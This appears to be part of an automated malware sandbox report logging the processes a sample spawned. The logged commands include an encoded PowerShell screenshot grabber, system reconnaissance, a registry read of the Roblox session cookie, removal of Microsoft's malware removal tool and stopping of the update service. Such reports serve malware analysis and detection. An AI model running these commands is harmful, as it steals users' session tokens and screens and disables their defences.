                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:44
                                                            Start time:00:31:04
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:45
                                                            Start time:00:31:04
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:46
                                                            Start time:00:31:04
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:47
                                                            Start time:00:31:04
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\systeminfo.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:systeminfo
                                                            Imagebase:0x7ff6e23f0000
                                                            File size:110'080 bytes
                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:48
                                                            Start time:00:31:05
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:49
                                                            Start time:00:31:05
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff604c70000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:50
                                                            Start time:00:31:05
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:51
                                                            Start time:00:31:05
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:52
                                                            Start time:00:31:05
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:54
                                                            Start time:00:31:05
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff604c70000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:55
                                                            Start time:00:31:06
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:56
                                                            Start time:00:31:07
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:57
                                                            Start time:00:31:07
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff604c70000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:58
                                                            Start time:00:31:07
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline"
                                                            Imagebase:0x7ff6c5e60000
                                                            File size:2'759'232 bytes
                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:59
                                                            Start time:00:31:07
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8576.tmp" "c:\Users\user\AppData\Local\Temp\yidhhzbx\CSCA27ED749AA364CCD94BFD566BA81531.TMP"
                                                            Imagebase:0x7ff783040000
                                                            File size:52'744 bytes
                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:60
                                                            Start time:00:31:08
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:61
                                                            Start time:00:31:08
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:62
                                                            Start time:00:31:08
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff604c70000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:63
                                                            Start time:00:31:08
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:64
                                                            Start time:00:31:08
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:65
                                                            Start time:00:31:08
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff604c70000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:66
                                                            Start time:00:31:08
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:67
                                                            Start time:00:31:08
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:68
                                                            Start time:00:31:08
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\getmac.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:getmac
                                                            Imagebase:0x7ff7828f0000
                                                            File size:90'112 bytes
                                                            MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:69
                                                            Start time:00:31:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:70
                                                            Start time:00:31:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:71
                                                            Start time:00:31:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:72
                                                            Start time:00:31:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:73
                                                            Start time:00:31:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:74
                                                            Start time:00:31:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:75
                                                            Start time:00:31:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:76
                                                            Start time:00:31:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\wusa.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff6a5470000
